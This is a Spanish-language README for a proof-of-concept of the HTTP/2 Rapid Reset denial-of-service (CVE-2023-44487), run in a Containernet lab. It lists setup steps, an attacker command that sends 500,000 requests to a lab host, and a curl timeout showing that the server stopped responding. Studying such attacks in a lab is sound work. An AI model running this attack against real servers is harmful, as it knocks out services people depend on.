
PoC para la vulnerabilidad DDoS de Rapid Reset en HTTP/2 - CVE-2023-44487
Este proyecto demuestra el ataque de Denegación de Servicio (DoS) por Restablecimiento Rápido de HTTP/2 utilizando una topología de red personalizada creada con Containernet. El ataque explota vulnerabilidades en el protocolo HTTP/2 para abrumar a un servidor objetivo, dejándolo sin respuesta.

Para instalar los paquetes necesarios, ejecuta los siguientes comandos:
./install.sh
Para cambiar el directorio de instalación predeterminado, puedes modificar la variable INSTALL_DIR de la siguiente manera:
INSTALL_DIR=/custom/path ./install.sh
Para iniciar la infraestructura, ejecuta los siguientes comandos:
source ~/.containernet/containernet/venv/bin/activate
sudo -E env PATH=$PATH ./topo.py
Para iniciar el ataque, ejecuta el siguiente comando en el contenedor atacante:
./attacker -url='https://modern.art:443/api' -requests=500000
Después de unos momentos, cuando intentas acceder al sitio web usando curl, este deja de responder.
root@attacker:/attacker# curl -k https://modern.art/
curl: (28) SSL connection timeout
Para detener la infraestructura, simplemente escribe exit en la terminal donde se está ejecutando topo.py.